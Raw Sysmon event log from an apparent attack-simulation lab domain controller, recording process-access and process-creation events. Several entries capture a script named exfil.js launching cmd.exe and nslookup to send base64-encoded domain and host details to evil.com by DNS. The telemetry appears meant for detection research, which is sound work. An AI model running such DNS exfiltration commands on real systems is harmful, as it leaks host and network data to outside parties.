14:16:10.742{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-3F3E-000000005F02}8012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.742{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.742{2E1864BB-17A1-629A-783D-000000005F02}55527020C:\Windows\System32\WScript.exe{2E1864BB-17AA-629A-3F3E-000000005F02}8012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.742{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.742{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.747{2E1864BB-17AA-629A-3F3E-000000005F02}8012C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltolcgj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.742{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnohdkxj.tmpMD5=7564BBC357DA8472A939C2EE79A792F5,SHA256=2DBE8B361679ED57394E9EFB1DF40D5559A7E60F6F1F0A6E2904E60B52067C41,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.688{2E1864BB-17AA-629A-3D3E-000000005F02}42881028C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-3E3E-000000005F02}7616C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.688{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.673{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.673{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.673{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.673{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-3E3E-000000005F02}7616C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.673{2E1864BB-17AA-629A-3C3E-000000005F02}42844796C:\Windows\system32\cmd.exe{2E1864BB-17AA-629A-3E3E-000000005F02}7616C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.681{2E1864BB-17AA-629A-3E3E-000000005F02}7616C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AA-629A-3C3E-000000005F02}4284C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnohdkxj.tmp 2>&1 10341000x8000000000000000195381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.641{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17AA-629A-3D3E-000000005F02}4288C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.641{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AA-629A-3D3E-000000005F02}4288C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.641{2E1864BB-17AA-629A-3D3E-000000005F02}42881028C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-3C3E-000000005F02}4284C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.626{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-3D3E-000000005F02}4288C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.610{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.610{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.610{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.610{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.610{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-3C3E-000000005F02}4284C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.610{2E1864BB-17A1-629A-783D-000000005F02}55527328C:\Windows\System32\WScript.exe{2E1864BB-17AA-629A-3C3E-000000005F02}4284C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.620{2E1864BB-17AA-629A-3C3E-000000005F02}4284C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnohdkxj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.610{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrksg.tmpMD5=13DAE9C9CF6ADD4F8F46BEAD8C3CC212,SHA256=2DEC16DD493989E01C6A3048EE3C7ECCED532832FC7BFFA4BF3297D9C89C0784,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.557{2E1864BB-17AA-629A-3A3E-000000005F02}66727336C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-3B3E-000000005F02}5824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.557{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.557{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.557{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-3B3E-000000005F02}5824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 